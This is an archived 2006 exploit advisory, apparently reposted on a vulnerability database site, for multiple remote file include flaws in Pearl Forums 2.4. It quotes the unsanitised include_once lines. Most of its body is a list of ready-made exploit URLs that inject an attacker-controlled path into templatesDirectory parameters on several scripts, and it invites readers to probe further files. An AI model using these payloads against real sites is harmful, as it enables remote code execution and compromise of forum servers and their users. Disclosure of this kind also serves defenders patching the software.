Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15198
HistoryNov 22, 2006 - 12:00 a.m.

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

2006-11-2200:00:00
vulners.com
64
JSON

| __ \ | \/ | \ \ / ()
| | | | __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '| | |\/| |/ _` \ \/ / \ \/ / | | '| | | / |
| || | | | | | | (| |> < \ / | | | | || \__ \
|/|| || |_|\,//\\ \/ ||_| \,|_/

/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main Script Of Pearl Products
//Affected Version:2.4
//D
script:http://sourceforge.net/project/downloading.php?group_id=102974&amp;use_mirror=switch&amp;filename=pearlforums2.4.zip&amp;351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

Bug in
adressbook.php & admin.php & merge.php &
more than
u expected files r vulnerable just try to check all files
Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------\\

Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");

Exploits:

Note that more variables are not sanitized so Exploits can work
Successfuly when
register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code

   And Many Bug u can discovered just download the script

-----------------------------------------------------------------------------------
   Thx To:str0ke &amp; www.milw0rm.com &amp; www.zone-h.com &amp; All My Friends
   Special Gr33Ts:ASIANEAGLE &amp; Kacper &amp; The Master

////////////////////////////////////////////////////////////////////////////////////
JSON